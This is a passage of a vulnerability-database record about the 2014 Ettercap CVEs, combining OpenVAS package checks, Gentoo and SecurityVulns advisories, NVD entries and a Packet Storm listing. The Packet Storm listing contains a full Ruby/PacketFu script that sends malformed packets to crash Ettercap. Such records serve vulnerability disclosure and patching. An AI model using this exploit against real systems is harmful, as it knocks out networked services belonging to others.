"title": "Fedora Update for ettercap FEDORA-2014-17107", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for ettercap FEDORA-2014-17107\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.868758\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2015-01-05 14:49:41 +0100 (Mon, 05 Jan 2015)\");\n script_cve_id(\"CVE-2014-6396\", \"CVE-2014-6395\", \"CVE-2014-9377\", \"CVE-2014-9376\",\n \"CVE-2014-9379\", \"CVE-2014-9378\", \"CVE-2014-9380\", \"CVE-2014-9381\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Fedora Update for ettercap FEDORA-2014-17107\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'ettercap'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"ettercap on Fedora 20\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2014-17107\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2015-January/147428.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC20\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC20\")\n{\n\n if ((res = isrpmvuln(pkg:\"ettercap\", rpm:\"ettercap~0.8.1~2.fc20\", rls:\"FC20\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-03-18T14:34:57", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2015-03-27T00:00:00", "id": "OPENVAS:1361412562310869132", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310869132", "title": "Fedora Update for ettercap FEDORA-2015-3984", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for ettercap FEDORA-2015-3984\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.869132\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2015-03-27 06:50:45 +0100 (Fri, 27 Mar 2015)\");\n script_cve_id(\"CVE-2014-6395\", \"CVE-2014-6396\", \"CVE-2014-9376\", \"CVE-2014-9377\",\n \"CVE-2014-9378\", \"CVE-2014-9379\", \"CVE-2014-9380\", \"CVE-2014-9381\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for ettercap FEDORA-2015-3984\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'ettercap'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"ettercap on Fedora 21\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2015-3984\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2015-March/153096.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC21\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC21\")\n{\n\n if ((res = isrpmvuln(pkg:\"ettercap\", rpm:\"ettercap~0.8.2~1.fc21\", rls:\"FC21\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-03-18T14:35:20", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2015-01-05T00:00:00", "id": "OPENVAS:1361412562310868847", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310868847", "title": "Fedora Update for ettercap FEDORA-2014-17210", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for ettercap FEDORA-2014-17210\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.868847\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2015-01-05 14:58:36 +0100 (Mon, 05 Jan 2015)\");\n script_cve_id(\"CVE-2014-6396\", \"CVE-2014-6395\", \"CVE-2014-9377\", \"CVE-2014-9376\",\n \"CVE-2014-9379\", \"CVE-2014-9378\", \"CVE-2014-9380\", \"CVE-2014-9381\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Fedora Update for ettercap FEDORA-2014-17210\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'ettercap'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"ettercap on Fedora 19\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2014-17210\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2015-January/147435.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC19\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC19\")\n{\n\n if ((res = isrpmvuln(pkg:\"ettercap\", rpm:\"ettercap~0.8.1~2.fc19\", rls:\"FC19\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "gentoo": [{"lastseen": "2016-09-06T19:46:16", "bulletinFamily": "unix", "description": "### Background\n\nEttercap is a comprehensive suite for man in the middle attacks.\n\n### Description\n\nMultiple vulnerabilities have been discovered in Ettercap. Please review the CVE identifiers referenced below for details. \n\n### Impact\n\nA remote attacker could possibly execute arbitrary code with the privileges of the process or cause a Denial of Service condition. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll Ettercap users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=net-analyzer/ettercap-0.8.2\"", "modified": "2015-05-13T00:00:00", "published": "2015-05-13T00:00:00", "id": "GLSA-201505-01", "href": "https://security.gentoo.org/glsa/201505-01", "type": "gentoo", "title": "Ettercap: Multiple vulnerabilities", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:09:58", "bulletinFamily": "software", "description": "Multiple memory corruptions in different protocols dissectors.", "modified": "2014-12-22T00:00:00", "published": "2014-12-22T00:00:00", "id": "SECURITYVULNS:VULN:14161", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14161", "title": "ettercap multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:56", "bulletinFamily": "software", "description": "\r\n\r\n"Ettercap 8.0 - 8.1" multiple vulnerabilities\r\n\r\nDescription\r\n------------------------------------------------------------\r\nTwelve vulnerabilities exist on ettercap-ng which allow remote denial of\r\nservice and possible remote code execution. Specifically, the following\r\nvulnerabilities were identified:\r\n \r\n- A Length Parameter Inconsistency at ettercap 8.0 dissector_postgresql()\r\nwhich may lead to remote code execution or denial of service.\r\n- An arbitary write of zero in to any location at ettercap 8.0\r\ndissector_postgresql\r\n- A negative index/underflow at ettercap 8.1 dissector_dhcp() which may lead\r\nto denial of service\r\n- A heap overflow at ettercap 8.1 nbns_spoof() plugin which may lead to\r\nremote code execution or denial of service.\r\n- An unchecked return value at ettercap 8.1 mdns_spoof() plugin which may\r\nlead to remote denial of service.\r\n- A negative index/underflow at ettercap 8.1 dissector_TN3270\r\n- A negative index/underflow at ettercap 8.1 dissector_gg\r\n- A negative index/underflow at ettercap 8.1 get_decode_len()\r\n- An incorrect cast at ettercap 8.1 dissector_radius which may lead to\r\nremote code execution or denial of service.\r\n- A buffer over-read at ettercap 8.1 dissector_cvs which may lead to denial\r\nof service\r\n- A signedness error at ettercap 8.1 dissector_cvs\r\n- An unchecked return value at ettercap 8.1 dissector_imap which may lead to\r\ndenial of service\r\n\r\n\r\nResearcher\r\n------------------------------------------------------------\r\nNick Sampanis (n.sampanis[a t]obrela[do t]com)\r\n\r\n\r\nVulnerabilities\r\n------------------------------------------------------------\r\nLength Parameter Inconsistency CVE-2014-6395\r\nArbitary write CVE-2014-6396\r\nNegative index/underflow CVE-2014-9376\r\nHeap overflow CVE-2014-9377\r\nUnchecked return value CVE-2014-9378\r\nIncorrect cast CVE-2014-9379\r\nBuffer over-read CVE-2014-9380\r\nSignedness error CVE-2014-9381\r\n\r\n\r\nBugs and fixes submit date\r\n------------------------------------------------------------\r\n10/09/2014 and 03/11/2014\r\n\r\nSolution - fix & patch\r\n------------------------------------------------------------\r\nDownload the latest ettercap. Download the respective commits from github.\r\nSoon a new version will be released but at the time there is no patched\r\nversion.\r\n\r\nhttps://github.com/NickSampanis/ettercap/commit/e3abe7d7585ecc420a7cab733132\r\n16613aadad5a\r\nhttps://github.com/NickSampanis/ettercap/commit/103f16582ee88341a6a610378011\r\n781cdc866b0c\r\nhttps://github.com/NickSampanis/ettercap/commit/3f0c582826095c722ab6fbf91518\r\n282a765a0b68\r\nhttps://github.com/NickSampanis/ettercap/commit/cb7b2028dc03c628aa0a1a5130ca\r\n41421ddebcb2\r\nhttps://github.com/NickSampanis/ettercap/commit/edd337d5d4f37ab8e330c5e06734\r\n4dd5b3f10435\r\nhttps://github.com/NickSampanis/ettercap/commit/37dcfdf79e1ac6dcacd565894cd7\r\n717aa0224164\r\nhttps://github.com/NickSampanis/ettercap/commit/c2a3c99af956146570d7883e4b54\r\n0b9d0c0a3c46\r\nhttps://github.com/NickSampanis/ettercap/commit/6b196e011fa456499ed4650a3609\r\n61a2f1323818\r\nhttps://github.com/NickSampanis/ettercap/commit/31b937298c8067e6b0c3217c95ed\r\nceb983dfc4a2\r\nhttps://github.com/NickSampanis/ettercap/commit/9e9fdc7ed1ee8eba01a5a05e000b\r\n6c55d2a70923\r\n\r\n\r\nReference:\r\n------------------------------------------------------------\r\nhttps://www.obrela.com/home/security-labs/advisories/osi-advisory-osi-1402/\r\n\r\n", "modified": "2014-12-22T00:00:00", "published": "2014-12-22T00:00:00", "id": "SECURITYVULNS:DOC:31528", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31528", "title": ""Ettercap 8.0 - 8.1" multiple vulnerabilities", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:14:00", "bulletinFamily": "exploit", "description": "", "modified": "2014-12-20T00:00:00", "published": "2014-12-20T00:00:00", "href": "https://packetstormsecurity.com/files/129673/Ettercap-0.8.0-0.8.1-Denial-Of-Service.html", "id": "PACKETSTORM:129673", "type": "packetstorm", "title": "Ettercap 0.8.0 / 0.8.1 Denial Of Service", "sourceData": "`#Exploit Title: 6 Remote ettercap Dos exploits to 1 \n#Date: 19/12/2014 \n#Exploit Author: Nick Sampanis \n#Vendor Homepage: http://ettercap.github.io \n#Software Link: https://github.com/Ettercap/ettercap/archive/v0.8.1.tar.gz \n#Version: 8.0-8.1 \n#Tested on: Linux \n#CVE: CVE-2014-6395 CVE-2014-9376 CVE-2014-9377 CVE-2014-9378 CVE-2014-9379 \n#Make sure that you have installed packefu and pcaprub \n \nrequire 'packetfu' \ninclude PacketFu \n \nif ARGV.count < 4 \nputs \"[-]Usage #{$PROGRAM_NAME} src_ip dst_ip src_mac iface\" \nputs \"[-]Use valid mac for your interface, if you dont know\"+ \n\" victim's ip address use broadcast\" \nexit \nend \n \ndef nbns_header \nu = UDPPacket.new() \nu.eth_saddr = ARGV[2] \nu.eth_daddr = \"ff:ff:ff:ff:ff:ff\" \nu.ip_daddr = ARGV[1] \nu.ip_saddr = ARGV[0] \nu.udp_src = 4444 \nu.udp_dst = 137 \nu.payload = \"\\xa0\\x2c\\x01\\x10\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\" \nu.payload << \"\\x20\\x46\\x48\\x45\\x50\\x46\\x43\\x45\\x4c\\x45\\x48\\x46\"#name \nu.payload << \"\\x43\\x45\\x50\\x46\\x46\\x46\\x41\\x43\\x41\\x43\\x41\\x43\"#name \nu.payload << \"\\x41\\x43\\x41\\x43\\x41\\x43\\x41\\x41\\x41\\x00\"#name \nu.payload << \"\\x00\\x20\" #type \nu.payload << \"\\x00\\x01\" #class \nu.payload << \"A\"*1000 #pad \nu.recalc \nu.to_w(ARGV[3]) \nend \ndef gg_client \nu = TCPPacket.new() \nu.eth_saddr = ARGV[2] \nu.eth_daddr = \"ff:ff:ff:ff:ff:ff\" \nu.ip_saddr = ARGV[0] \nu.ip_daddr = ARGV[1] \nu.tcp_src = 3333 \nu.tcp_dst = 8074 \nu.payload = \"\\x15\\x00\\x00\\x00\" #gg_type \nu.payload << \"\\xe8\\x03\\x00\\x00\" #gg_len \nu.payload << \"A\"*1000 \nu.recalc \nu.to_w(ARGV[3]) \nend \ndef dhcp_header \nu = UDPPacket.new() \nu.eth_saddr = ARGV[2] \nu.eth_daddr = \"ff:ff:ff:ff:ff:ff\" \nu.ip_daddr = ARGV[0] \nu.ip_saddr = ARGV[1] \nu.udp_src = 67 \nu.udp_dst = 4444 \nu.payload = \"\\x02\"*236 \nu.payload << \"\\x63\\x82\\x53\\x63\" \nu.payload << \"\\x35\" \nu.payload << \"\\x00\\x05\\x00\" \nu.payload << \"\\x51\" \nu.payload << \"\\x00\" #size \nu.payload << \"A\" * 3 #pad \nu.recalc \nu.to_w(ARGV[3]) \nend \n \ndef mdns_header \nu = UDPPacket.new() \nu.eth_saddr = ARGV[2] \nu.eth_daddr = \"ff:ff:ff:ff:ff:ff\" \nu.ip_daddr = ARGV[1] \nu.ip_saddr = ARGV[0] \nu.udp_src = 4444 \nu.udp_dst = 5353 \nu.payload = \"\\x11\\x11\" #id \nu.payload << \"\\x00\\x00\" #flags \nu.payload << \"\\x00\\x01\" #questions \nu.payload << \"\\x00\\x00\" #answer_rr \nu.payload << \"\\x00\\x00\" #auth_rrs \nu.payload << \"\\x00\\x00\" #additional_rr \nu.payload << \"\\x06router\\x05local\\x00\" #name \nu.payload << \"\\x00\\x01\" #type \nu.payload << \"\\x00\\x01\" #class \nu.recalc \nu.to_w(ARGV[3]) \nend \ndef mdns_dos_header \nu = UDPPacket.new() \nu.eth_saddr = ARGV[2] \nu.eth_daddr = \"ff:ff:ff:ff:ff:ff\" \nu.ip_daddr = ARGV[1] \nu.ip_saddr = ARGV[0] \nu.udp_src = 4444 \nu.udp_dst = 5353 \nu.payload = \"\\x11\\x11\" #id \nu.payload << \"\\x00\\x00\" #flags \nu.payload << \"\\x00\\x01\" #questions \nu.payload << \"\\x00\\x00\" #answer_rr \nu.payload << \"\\x00\\x00\" #auth_rrs \nu.payload << \"\\x00\\x00\" #additional_rr \nu.payload << \"\\x01\" \nu.payload << \"\\x00\\x01\" #type \nu.payload << \"\\x00\\x01\" #class \nu.payload << \"A\"*500 \nu.recalc \nu.to_w(ARGV[3]) \nend \n \ndef pgsql_server \nu = TCPPacket.new() \nu.eth_saddr = ARGV[2] \nu.eth_daddr = \"ff:ff:ff:ff:ff:ff\" \nu.ip_saddr = ARGV[1] \nu.ip_daddr = ARGV[0] \nu.tcp_src = 5432 \nu.tcp_dst = 3333 \nu.payload = \"\\x52\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x03\\x73\\x65\\x72\\x02\\x74\\x65\\x73\\x74\\x00\\x64\\x61\\x74\\x61\\x62\\x61\\x73\\x65\\x02\\x74\\x65\\x73\\x74\\x00\\x63\\x6c\\x69\\x65\\x6e\\x74\\x5f\\x65\\x6e\\x63\\x6f\\x64\\x69\\x6e\\x67\\x00\\x55\\x4e\\x49\\x43\\x4f\\x44\\x45\\x00\\x44\\x61\\x74\\x65\\x53\\x74\\x79\\x6c\\x65\\x00\\x49\\x53\\x4f\\x00\\x54\\x69\\x6d\\x65\\x5a\\x6f\\x6e\\x65\\x00\\x55\\x53\\x2f\\x50\\x61\\x63\\x69\\x66\\x69\\x63\\x00\\x00\" \nu.recalc \nu.to_w(ARGV[3]) \nend \ndef pgsql_client \nu = TCPPacket.new() \nu.eth_saddr = ARGV[2] \nu.eth_daddr = \"ff:ff:ff:ff:ff:ff\" \nu.ip_saddr = ARGV[0] \nu.ip_daddr = ARGV[1] \nu.tcp_src = 3333 \nu.tcp_dst = 5432 \nu.payload = \"\\x70\\x00\\x00\\x5b\\x00\\x03\\x00\\x00\\x75\\x73\\x65\\x72\\x02\\x74\\x65\\x73\\x74\\x00\\x64\\x61\\x74\\x61\\x62\\x61\\x73\\x65\\x02\\x74\\x65\\x73\\x74\\x00\\x63\\x6c\\x69\\x65\\x6e\\x74\\x5f\\x65\\x6e\\x63\\x6f\\x64\\x69\\x6e\\x67\\x00\\x55\\x4e\\x49\\x43\\x4f\\x44\\x45\\x00\\x44\\x61\\x74\\x65\\x53\\x74\\x79\\x6c\\x65\\x00\\x49\\x53\\x4f\\x00\\x54\\x69\\x6d\\x65\\x5a\\x6f\\x6e\\x65\\x00\\x55\\x53\\x2f\\x50\\x61\\x63\\x69\\x66\\x69\\x63\\x00\\x00\" \nu.recalc \nu.to_w(ARGV[3]) \nend \n \ndef pgsql_client_shell \nu = TCPPacket.new() \nu.eth_saddr = ARGV[2] \nu.eth_daddr = \"ff:ff:ff:ff:ff:ff\" \nu.ip_saddr = ARGV[0] \nu.ip_daddr = ARGV[1] \nu.tcp_src = 3333 \nu.tcp_dst = 5432 \nu.payload = \"\\x70\" \nu.payload << \"\\x00\\x00\\x03\\xe9\" #len \nu.payload << \"A\"*1000 \nu.payload << \"\\x00\" \nu.recalc \nu.to_w(ARGV[3]) \nend \n \ndef radius_header \nu = UDPPacket.new() \nu.eth_saddr = ARGV[2] \nu.eth_daddr = \"ff:ff:ff:ff:ff:ff\" \nu.ip_daddr = ARGV[1] \nu.ip_saddr = ARGV[0] \nu.udp_src = 4444 \nu.udp_dst = 1645 \nu.payload = \"\\x01\\x01\\x00\\xff\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x20\\x46\\x48\\x00\\x50\\x46\\x43\\xff\\x01\\x00\\x48\\x46\\x01\\x00\\x50\\x46\\x46\\x46\\x41\\x43\\x41\\x43\\x41\\x43\\x41\\x43\\x41\\x43\\x41\\x43\\x41\\x41\\x41\\x00\\x00\\x20\\x00\\x01\" \nu.recalc \nu.to_w(ARGV[3]) \nend \n \nputs \"[+]6 Remote ettercap Dos exploits to 1 by Nick Sampanis\" \nputs \"[+]-1- nbns plugin CVE-2014-9377\" \nputs \"[+]-2- gg dissector CVE-2014-9376\" \nputs \"[+]-3- dhcp dissector CVE-2014-9376\" \nputs \"[+]-4- mdns plugin CVE-2014-9378\" \nputs \"[+]-5- postgresql dissector CVE-2014-6395(works only in 8.0)\" \nputs \"[+]-6- radius dissector CVE-2014-9379\" \nprint \"choice:\" \nchoice = $stdin.gets.chomp().to_i() \n \ncase choice \nwhen 1 \nputs \"[+]Sending nbns packet..\" \nnbns_header \nwhen 2 \nputs \"[+]Sending client gg packet..\" \ngg_client \nwhen 3 \nputs \"[+]Sending dhcp packet..\" \ndhcp_header \nwhen 4 \nputs \"[+]Sending mdns packet..\" \nmdns_header \nmdns_dos_header \nwhen 5 \nputs \"[+]Sending pgsql packet..\" \npgsql_client \npgsql_server \npgsql_client_shell \nwhen 6 \nputs \"[+]Sending radius packet..\" \nradius_header \nelse \nputs \"[-]Unrecognized command \" \nend \n \n \n`\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/129673/ettercap080-dos.txt"}], "cve": [{"lastseen": "2018-10-10T11:05:24", "bulletinFamily": "NVD", "description": "Integer underflow in Ettercap 0.8.1 allows remote attackers to cause a denial of service (out-of-bounds write) and possibly execute arbitrary code via a small (1) size variable value in the dissector_dhcp function in dissectors/ec_dhcp.c, (2) length value to the dissector_gg function in dissectors/ec_gg.c, or (3) string length to the get_decode_len function in ec_utils.c or a request without a (4) username or (5) password to the dissector_TN3270 function in dissectors/ec_TN3270.c.", "modified": "2018-10-09T15:55:04", "published": "2014-12-19T10:59:27", "id": "CVE-2014-9376", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9376", "title": "CVE-2014-9376", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-10-10T11:05:22", "bulletinFamily": "NVD", "description": "The dissector_postgresql function in dissectors/ec_postgresql.c in Ettercap before 0.8.1 allows remote attackers to cause a denial of service and possibly execute arbitrary code via a crafted password length, which triggers a 0 character to be written to an arbitrary memory location.", "modified": "2018-10-09T15:51:22", "published": "2014-12-19T10:59:07", "id": "CVE-2014-6396", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6396", "title": "CVE-2014-6396", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-10-10T11:05:24", "bulletinFamily": "NVD", "description": "Integer signedness error in the dissector_cvs function in dissectors/ec_cvs.c in Ettercap 0.8.1 allows remote attackers to cause a denial of service (crash) via a crafted password, which triggers a large memory allocation.", "modified": "2018-10-09T15:55:06", "published": "2014-12-19T10:59:31", "id": "CVE-2014-9381", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9381", "title": "CVE-2014-9381", "type": "cve", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-10-10T11:05:24", "bulletinFamily": "NVD", "description": "Heap-based buffer overflow in the nbns_spoof function in plug-ins/nbns_spoof/nbns_spoof.c in Ettercap 0.8.1 allows remote attackers to cause a denial of service or possibly execute arbitrary code via a large netbios packet.", "modified": "2018-10-09T15:55:05", "published": "2014-12-19T10:59:27", "id": "CVE-2014-9377", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9377", "title": "CVE-2014-9377", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-10-10T11:05:24", "bulletinFamily": "NVD", "description": "The dissector_cvs function in dissectors/ec_cvs.c in Ettercap 0.8.1 allows remote attackers to cause a denial of service (out-of-bounds read) via a packet containing only a CVS_LOGIN signature.", "modified": "2018-10-09T15:55:06", "published": "2014-12-19T10:59:30", "id": "CVE-2014-9380", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9380", "title": "CVE-2014-9380", "type": "cve", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-10-10T11:05:22", "bulletinFamily": "NVD", "description": "Heap-based buffer overflow in the dissector_postgresql function in dissectors/ec_postgresql.c in Ettercap before 0.8.1 allows remote attackers to cause a denial of service or possibly execute arbitrary code via a crafted password length value that is inconsistent with the actual length of the password.", "modified": "2018-10-09T15:51:22", "published": "2014-12-19T10:59:06", "id": "CVE-2014-6395", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6395", "title": "CVE-2014-6395", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-10-10T11:05:24", "bulletinFamily": "NVD", "description": "Ettercap 0.8.1 does not validate certain return values, which allows remote attackers to cause a denial of service (crash) or possibly execute arbitrary code via a crafted (1) name to the parse_line function in mdns_spoof/mdns_spoof.c or (2) base64 encoded password to the dissector_imap function in dissectors/ec_imap.c.", "modified": "2018-10-09T15:55:05", "published": "2014-12-19T10:59:28", "id": "CVE-2014-9378", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9378", "title": "CVE-2014-9378", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-10-10T11:05:24", "bulletinFamily": "NVD", "description": "The radius_get_attribute function in dissectors/ec_radius.c in Ettercap 0.8.1 performs an incorrect cast, which allows remote attackers to cause a denial of service (crash) or possibly execute arbitrary code via unspecified vectors, which triggers a stack-based buffer overflow.", "modified": "2018-10-09T15:55:05", "published": "2014-12-19T10:59:29", "id": "CVE-2014-9379", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9379", "title": "CVE-2014-9379", "type": "cve", "cvss": {"score": 7.5, "vector": 